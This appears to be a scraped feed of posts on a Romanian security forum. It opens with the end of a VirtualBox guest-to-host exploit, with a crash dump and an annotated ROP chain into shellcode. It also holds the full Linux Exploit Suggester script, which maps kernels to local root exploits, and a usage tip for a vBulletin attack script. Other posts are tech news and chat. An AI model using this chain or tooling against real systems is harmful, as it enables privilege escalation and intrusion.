print_status("Closing the device...") session.railgun.kernel32.CloseHandle(@handle) end end end =begin * VirtualBox 4.3.6 / Windows 7 SP1 64 bits Crash after second message: 0:013> dd rax 00000000`0e99bd44 41306141 61413161 33614132 41346141 00000000`0e99bd54 61413561 37614136 41386141 62413961 00000000`0e99bd64 31624130 41326241 62413362 35624134 00000000`0e99bd74 41366241 62413762 39624138 41306341 00000000`0e99bd84 63413163 33634132 41346341 63413563 00000000`0e99bd94 37634136 41386341 64413963 31644130 00000000`0e99bda4 41326441 64413364 35644134 41366441 00000000`0e99bdb4 64413764 39644138 41306541 65413165 0:013> r rax=000000000e99bd44 rbx=0000000000000001 rcx=000007fef131e8ba rdx=000000006a72fb62 rsi=000000000e5531f0 rdi=0000000000000000 rip=000007fef12797f8 rsp=0000000004b5f620 rbp=0000000041424344 << already controlled... r8=0000000000000001 r9=00000000000005c0 r10=0000000000000000 r11=0000000000000246 r12=0000000000000000 r13=00000000ffffffff r14=000007fef1f90000 r15=0000000002f6e280 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 VBoxSharedCrOpenGL!crServerAddNewClient+0x208: 000007fe`f12797f8 ff9070030000 call qword ptr [rax+370h] ds:00000000`0e99c0b4=7641397541387541 Gadget 1: Stack Pivot # 0x6a682a2a xchg eax,esp 94 ret c3 Gadget 2: Control RDX value # 0x6a68599a pop rdx 5a xor ecx,dword ptr [rax] 33 08 add cl,cl 00 c9 movzx eax,al 0f b6 c0 ret c3 Gadget 3: Store ptr to RSP in RAX # 0x6a70a560 lea rax,[rsp+8] 48 8d 44 24 08 ret c3 Gadget 4: Store ptr to RSP + RDX offset (controlled) in RAX # 0x6a692b1c lea rax,[rdx+rax] 48 8d 04 02 ret c3 Gadget 5: Write Stack Address (EAX) to the stack # 0x6a6931d6 add dword ptr [rax],eax 01 00 add cl,cl 00 c9 ret c3 Gadget 6: Control R12 # 0x6a68124e pop r12 ret Gadget 7: Recover VirtualProtect arguments from the stack and call it (ebp) # 0x6a70927d mov r9,r12 4d 89 e1 mov r8d,dword ptr [rsp+8Ch] 44 8b 84 24 8c 00 00 00 mov rdx,qword ptr [rsp+68h] 48 8b 54 24 68 mov rcx,qword ptr [rsp+50h] 48 8b 4c 24 50 call rbp ff d5 Gadget 8: After VirtualProtect, get pointer to the shellcode in the # 0x6a70a560 lea rax, [rsp+8] 48 8d 44 24 08 ret c3 Gadget 9: Push the pointer and provide control to shellcode # 0x6a6c9d3d push rax 50 adc cl,ch 10 e9 ret c3 =end Source: http://www.exploit-db.com/exploits/34334/
  15. Sa nu mai cautati manual dupa exploit. Source: https://github.com/PenturaLabs/Linux_Exploit_Suggester [COLOR=#000000]#!/usr/bin/perl[/COLOR]use strict; use warnings; use Getopt::Std; our $VERSION = '0.9'; my %opts; getopt( 'k,h', \%opts ); usage() if exists $opts{h}; my ( $khost, $is_partial ) = get_kernel(); print "\nKernel local: $khost\n\n"; my %exploits = get_exploits(); print 'Searching among ' . scalar keys(%exploits) . " exploits...\n\n"; print "Possible Exploits:\n"; EXPLOIT: foreach my $key ( sort keys %exploits ) { foreach my $kernel ( @{ $exploits{$key}{vuln} } ) { if ( $khost eq $kernel or ( $is_partial and index($kernel,$khost) == 0 ) ) { print "[+] $key"; print " ($kernel)" if $is_partial; my $alt = $exploits{$key}{alt}; my $cve = $exploits{$key}{cve}; my $mlw = $exploits{$key}{mil}; if ( $alt or $cve ) { print "\n"; } if ( $alt ) { print " Alt: $alt "; } if ( $cve ) { print " CVE-$cve"; } if ( $mlw ) { print "\n Source: $mlw"; } print "\n"; next EXPLOIT; } } } exit; ###################### ## extra functions ## ###################### sub get_kernel { my $khost = ''; if ( exists $opts{k} ) { $khost = $opts{k}; } else { $khost = `uname -r |cut -d"-" -f1`; chomp $khost; } # partial kernels might be provided by the user, # such as '2.4' or '2.6.' my $is_partial = $khost =~ /^\d+\.\d+\.?\d?/ ? 0 : 1; if ( $is_partial and substr($khost,-1) ne '.' ) { $khost .= '.'; } return ( $khost, $is_partial ); } sub usage { print <<"EOUSAGE"; Linux Exploit Suggester $VERSION Usage: \t$0 [-h] [-k kernel] [-h] help (this message) [-k] kernel number eg. 2.6.28 You can also provide a partial kernel version (eg. 2.4) to see all exploits available. EOUSAGE } sub get_exploits { return ( 'w00t' => { vuln => [ '2.4.10', '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', ] }, 'brk' => { vuln => [ '2.4.10', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ], }, 'ave' => { vuln => [ '2.4.19', '2.4.20' ] }, 'elflbl' => { vuln => ['2.4.29'], mil => 'http://www.exploit-db.com/exploits/744/', }, 'elfdump' => { vuln => ['2.4.27'] }, 'elfcd' => { vuln => ['2.6.12'] }, 'expand_stack' => { vuln => ['2.4.29'] }, 'h00lyshit' => { vuln => [ '2.6.8', '2.6.10', '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', ], cve => '2006-3626', mil => 'http://www.exploit-db.com/exploits/2013/', }, 'kdump' => { vuln => ['2.6.13'] }, 'km2' => { vuln => [ '2.4.18', '2.4.22' ] }, 'krad' => { vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ] }, 'krad3' => { vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ], mil => 'http://exploit-db.com/exploits/1397', }, 'local26' => { vuln => ['2.6.13'] }, 'loko' => { vuln => [ '2.4.22', '2.4.23', '2.4.24' ] }, 'mremap_pte' => { vuln => [ '2.4.20', '2.2.24', '2.4.25', '2.4.26', '2.4.27' ], mil => 'http://www.exploit-db.com/exploits/160/', }, 'newlocal' => { vuln => [ '2.4.17', '2.4.19' ] }, 'ong_bak' => { vuln => ['2.6.5'] }, 'ptrace' => { vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ] }, 'ptrace_kmod' => { vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ], cve => '2007-4573', }, 'ptrace_kmod2' => { vuln => [ '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', ], alt => 'ia32syscall,robert_you_suck', mil => 'http://www.exploit-db.com/exploits/15023/', cve => '2010-3301', }, 'ptrace24' => { vuln => ['2.4.9'] }, 'pwned' => { vuln => ['2.6.11'] }, 'py2' => { vuln => [ '2.6.9', '2.6.17', '2.6.15', '2.6.13' ] }, 'raptor_prctl' => { vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], cve => '2006-2451', mil => 'http://www.exploit-db.com/exploits/2031/', }, 'prctl' => { vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], mil => 'http://www.exploit-db.com/exploits/2004/', }, 'prctl2' => { vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], mil => 'http://www.exploit-db.com/exploits/2005/', }, 'prctl3' => { vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], mil => 'http://www.exploit-db.com/exploits/2006/', }, 'prctl4' => { vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], mil => 'http://www.exploit-db.com/exploits/2011/', }, 'remap' => { vuln => ['2.4.'] }, 'rip' => { vuln => ['2.2.'] }, 'stackgrow2' => { vuln => [ '2.4.29', '2.6.10' ] }, 'uselib24' => { vuln => [ '2.6.10', '2.4.17', '2.4.22', '2.4.25', '2.4.27', '2.4.29' ] }, 'newsmp' => { vuln => ['2.6.'] }, 'smpracer' => { vuln => ['2.4.29'] }, 'loginx' => { vuln => ['2.4.22'] }, 'exp.sh' => { vuln => [ '2.6.9', '2.6.10', '2.6.16', '2.6.13' ] }, 'vmsplice1' => { vuln => [ '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.24.1', ], alt => 'jessica biel', cve => '2008-0600', mil => 'http://www.exploit-db.com/exploits/5092', }, 'vmsplice2' => { vuln => [ '2.6.23', '2.6.24' ], alt => 'diane_lane', cve => '2008-0600', mil => 'http://www.exploit-db.com/exploits/5093', }, 'vconsole' => { vuln => ['2.6.'], cve => '2009-1046', }, 'sctp' => { vuln => ['2.6.26'], cve => '2008-4113', }, 'ftrex' => { vuln => [ '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', ], cve => '2008-4210', mil => 'http://www.exploit-db.com/exploits/6851', }, 'exit_notify' => { vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ], mil => 'http://www.exploit-db.com/exploits/8369', }, 'udev' => { vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ], alt => 'udev <1.4.1', cve => '2009-1185', mil => 'http://www.exploit-db.com/exploits/8478', }, 'sock_sendpage2' => { vuln => [ '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15', '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27', '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', ], alt => 'proto_ops', cve => '2009-2692', mil => 'http://www.exploit-db.com/exploits/9436', }, 'sock_sendpage' => { vuln => [ '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15', '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27', '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', ], alt => 'wunderbar_emporium', cve => '2009-2692', mil => 'http://www.exploit-db.com/exploits/9435', }, 'udp_sendmsg_32bit' => { vuln => [ '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', ], cve => '2009-2698', mil => 'http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c', }, 'pipe.c_32bit' => { vuln => [ '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15', '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27', '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', ], cve => '2009-3547', mil => 'http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c', }, 'do_pages_move' => { vuln => [ '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', ], alt => 'sieve', cve => '2010-0415', mil => 'Spenders Enlightenment', }, 'reiserfs' => { vuln => [ '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', ], cve => '2010-1146', mil => 'http://www.exploit-db.com/exploits/12130/', }, 'can_bcm' => { vuln => [ '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', ], cve => '2010-2959', mil => 'http://www.exploit-db.com/exploits/14814/', }, 'rds' => { vuln => [ '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', ], mil => 'http://www.exploit-db.com/exploits/15285/', cve => '2010-3904', }, 'half_nelson' => { vuln => [ '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', ], alt => 'econet', cve => '2010-3848', mil => 'http://www.exploit-db.com/exploits/6851', }, 'half_nelson1' => { vuln => [ '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', ], alt => 'econet', cve => '2010-3848', mil => 'http://www.exploit-db.com/exploits/17787/', }, 'half_nelson2' => { vuln => [ '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', ], alt => 'econet', cve => '2010-3850', mil => 'http://www.exploit-db.com/exploits/17787/', }, 'half_nelson3' => { vuln => [ '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', ], alt => 'econet', cve => '2010-4073', mil => 'http://www.exploit-db.com/exploits/17787/', }, 'caps_to_root' => { vuln => [ '2.6.34', '2.6.35', '2.6.36' ], cve => 'n/a', mil => 'http://www.exploit-db.com/exploits/15916/', }, 'american-sign-language' => { vuln => [ '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', ], cve => '2010-4347', mil => 'http://www.securityfocus.com/bid/45408/', }, 'pktcdvd' => { vuln => [ '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', ], cve => '2010-3437', mil => 'http://www.exploit-db.com/exploits/15150/', }, 'video4linux' => { vuln => [ '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', ], cve => '2010-3081', mil => 'http://www.exploit-db.com/exploits/15024/', }, 'memodipper' => { vuln => [ '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0', ], cve => '2012-0056', mil => 'http://www.exploit-db.com/exploits/18411/', }, 'semtex' => { vuln => [ '2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0', ], cve => '2013-2094', mil => 'http://www.exploit-db.com/download/25444/?', }, 'perf_swevent' => { vuln => [ '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0', '3.2', '3.3', '3.4.0', '3.4.1', '3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8', '3.4.9', '3.5', '3.6', '3.7', '3.8.0', '3.8.1', '3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7', '3.8.8', '3.8.9', ], cve => '2013-2094', mil => 'http://www.exploit-db.com/download/26131', }, 'msr' => { vuln => [ '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0', '3.2', '3.3', '3.4', '3.5', '3.6', '3.7.0', '3.7.6', ], cve => '2013-0268', mil => 'http://www.exploit-db.com/exploits/27297/', }, 'timeoutpwn' => { vuln => [ '3.4', '3.5', '3.6', '3.7', '3.8', '3.8.9', '3.9', '3.10', '3.11', '3.12', '3.13', '3.4.0', '3.5.0', '3.6.0', '3.7.0', '3.8.0','3.8.5', '3.8.6', '3.8.9', '3.9.0', '3.9.6', '3.10.0','3.10.6', '3.11.0','3.12.0','3.13.0','3.13.1' ], cve => '2014-0038', mil => 'http://www.exploit-db.com/exploits/31346/', }, 'rawmodePTY' => { vuln => [ '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.14', '3.15' ], cve => '2014-0196', mil => 'http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c', }, ); } __END__ =head1 NAME Linux_Exploit_Suggester.pl - A local exploit suggester for linux =head1 DESCRIPTION This perl script will enumerate the possible exploits available for a given kernel version =head1 USAGE $ Local_Exploit_Checker [-h] [-k kernel] [-h] help [-k] kernel Eg. 2.6.28 You can also provide a partial kernel version (eg. 2.4) to see all exploits available. =head1 AUTHOR Andy (c) 10-07-2009 Thanks to Brian for bugfixes, and sploit additions. =head1 CHANGELOG 19-04-2014 added cve-2014-0196 and bug fixes (Andy) 05-09-2013 code cleanup/optimizations and partial kernel feature (garu) 28-08-2013 added msr driver (Andy) 12-06-2013 added perf_swevent (Andy) 23-01-2012 added memodipper (Andy) 14-11-2011 bug fix to cut kernel version, plus a few more sploits listed (Brian) =cut =head1 LICENSE Linux Exploit Suggester This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. =cut Linux_Exploit_Suggester Linux Exploit Suggester; based on operating system release number. This program run without arguments will perform a 'uname -r' to grab the Linux Operating Systems release version, and return a suggestive list of possible exploits. Nothing fancy, so a patched/back-ported patch may fool this script. Additionally possible to provide '-k' flag to manually enter the Kernel Version/Operating System Release Version. This script has been extremely useful on site and in exams. Now Open-sourced under GPLv2. Sample Output $ perl ./Linux_Exploit_Suggester.pl -k 3.0.0 Kernel local: 3.0.0 Possible Exploits: [+] semtex CVE-2013-2094 Source: www.exploit-db.com/download/25444/? [+] memodipper CVE-2012-0056 Source: Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper [+] perf_swevent CVE-2013-2094 Source: http://www.exploit-db.com/download/26131 $ perl ./Linux_Exploit_Suggester.pl -k 2.6.28 Kernel local: 2.6.28 Possible Exploits: [+] sock_sendpage2 Alt: proto_ops CVE-2009-2692 Source: http://www.exploit-db.com/exploits/9436 [+] half_nelson3 Alt: econet CVE-2010-4073 Source: Linux Kernel < 2.6.36.2 - Econet Privilege Escalation Exploit [+] reiserfs CVE-2010-1146 Source: Linux Kernel <= 2.6.34-rc3 ReiserFS xattr - Privilege Escalation [+] pktcdvd CVE-2010-3437 Source: Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure [+] american-sign-language CVE-2010-4347 Source: Linux Kernel 'drivers/acpi/debugfs.c' Local Privilege Escalation Vulnerability [+] half_nelson Alt: econet CVE-2010-3848 Source: Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit [+] udev Alt: udev <1.4.1 CVE-2009-1185 Source: http://www.exploit-db.com/exploits/8478 [+] do_pages_move Alt: sieve CVE-2010-0415 Source: Spenders Enlightenment [+] pipe.c_32bit CVE-2009-3547 Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c [+] exit_notify Source: Linux Kernel < 2.6.29 exit_notify() Local Privilege Escalation Exploit [+] can_bcm CVE-2010-2959 Source: Linux Kernel < 2.6.36-rc1 CAN BCM - Privilege Escalation Exploit [+] ptrace_kmod2 Alt: ia32syscall,robert_you_suck CVE-2010-3301 Source: Linux Kernel < 2.6.36-rc4-git2 - x86_64 ia32syscall Emulation Privilege Escalation [+] half_nelson1 Alt: econet CVE-2010-3848 Source: Linux Kernel < 2.6.36.2 - Econet Privilege Escalation Exploit [+] half_nelson2 Alt: econet CVE-2010-3850 Source: Linux Kernel < 2.6.36.2 - Econet Privilege Escalation Exploit [+] sock_sendpage Alt: wunderbar_emporium CVE-2009-2692 Source: Linux Kernel 2.x - sock_sendpage() Local Ring0 Root Exploit [+] video4linux CVE-2010-3081 Source: Linux Kernel 2.6.27+ - x86_64 compat Local Root Exploit
  16. Nu ma asteptam, se pare ca au bagat in seama advisory-ul, l-au rezolvat si au lansat un fix. TRENDnet | Support | TEW-634GRU | N300 Wireless Gigabit Router w/ USB Port [LIST] [*]Hardware: V1.0R Firmware: 1.01B14 Date: 05/2014 Notes: [LIST] [*]Addressed security issue with TFTP access [*]Removed “User” account feature for added security [/LIST] [/LIST]
  17. @PoorStudentPleaseDonate e cea mai comuna. Mersi oricum!
  18. Dupa cum specifica acolo, Backtrack nu mai poate fi descarcat (de pe siteul oficial) deoarece este vechi si au renuntat la acesta. Kali este noua versiune. Daca totusi insisti sa instalezi Backtrack, ai aici cateva mirrors: > BackTrack > BackTrack 5 R3 - LQ ISO
  19. Wireless communication technologies are becoming so fast that cable-based LAN is starting to be left behind. It will soon reach the point where 10 GbE technologies will have to replace Gigabit Ethernet in order to avoid total awkwardness. Admittedly, it has already started, but the number of motherboards with 10 GbE is very small still, and it's not like there are many NAS devices and servers that offer the capability either. Because of that, many high-end dual-band wireless routers probably can't work to their full potential. Even if they have a total performance of 1,900 Mbps, they can't really use it all except for inter-device connections. If you have, say, 20 people trying to access the Internet from their PCs or phones at the same time, the data speed will be limited to what your cable can dish out. ASUS has decided to go ahead and release a truly ludicrously overpowered Wi-Fi router anyway: the RT-AC87, the first to boast Wave 2 features. Wave 2 Wi-Fi features provide better reliability, overall performance improvements and speed boosts in certain situations, for the 802.11ac generation of WiFi routers. Looking at the RT-AC87, we can definitely say that those claims have substance. We may have seen the 2.4 GHz band being pushed to 600 Mbps before (though rarely), but the 5 GHz did not come in 1.73 Gbps previously, even with the use of BeamForming (and yes, ASUS uses it, for maximized range and signal strength). This all boils down to a total data throughput of up to 2.33 Gbps, give or take a dozen Mbps. A very high performance indeed, with quite an advantage over the previous so-called record of 1.9 Gbps. It is quite surprising, in a way, that ASUS managed to be the first to take a slice of the Wave 2 pie. We would have expected Netgear, D-Link or even Belkin to open the doors, so to speak, considering that they actually focus on networking hardware, wireless or otherwise. Of course, they are bound to launch their own products soon, perhaps this very week. And they might not even have to worry about competing with ASUS, since the latter's RT-AC87 will only be available in North America at launch. Speaking of which, sales should start within a few days, for the price of $270 / €200. The other companies will probably hover around the same price point, or whatever the equivalent is in Europe, Australia and Asia. Source: http://news.softpedia.com/news/ASUS-Launches-The-Fastest-Wi-FI-Router-Ever-At-2-33-Gbps-451718.shtml
  20. Nu mai incercati pe alte versiuni de vBulletin si o sa mearga. Scriptul cauta dupa un text anume, text ce nu se regaseste pe toate versiunile. while(strpos($result, 'No Users Matched Your Query') == false)
  21. Trebuie sa il rulezi din consola. php script.php http://site.com/forum
  22. Xenforo am v?zut ca e destul de apreciat. E f?cut de câ?iva fosti developeri de la vBulletin.
  23. "KDE proudly announces the immediate availability of Plasma 5.0, providing a visually updated core desktop experience that is easy to use and familiar to the user. Plasma 5.0 introduces a new major version of KDE's workspace offering. The new Breeze artwork concept introduces cleaner visuals and improved readability. Central work-flows have been streamlined, while well-known overarching interaction patterns are left intact. Plasma 5.0 improves support for high-DPI displays and ships a converged shell, able to switch between user experiences for different target devices. Changes under the hood include the migration to a new, fully hardware-accelerated graphics stack centered around an OpenGL(ES) scenegraph. Plasma is built using Qt 5 and Frameworks 5." Source: KDE Releases Plasma 5 - Slashdot
  24. Nu este greu de asamblat pentru cine lucreaza in domeniul asta si are sculele necesare. Pe partea de software o sa fie si mai greu daca componentele variaza (o sa scrii drivere?). Avand in vedere ca ai pus intrebarea asta, nu te incadrezi in categoria celor care au o sansa sa il realizeze. Cat despre pretul unui telefon, este normal ca pretul de vanzare sa nu coincida cu pretul componentelor. Pe langa componente, mai costa si altele: transport, mana de lucru, marketing/promovare, sistemul de operare, suport, taxe si multe altele.
  25. Telefonul arata bine, specificatiile sunt decente si OS-ul pare ca se misca bine pe ele. Totusi e posibil ca nu toate aplicatiile Android sa fie complet functionale si de asemenea comunitatea este destul de restransa momentan. Personal nu m-as aventura sa il cumpar, as face un drive test inainte (desi nu pare deloc fezabil).
×
×
  • Create New...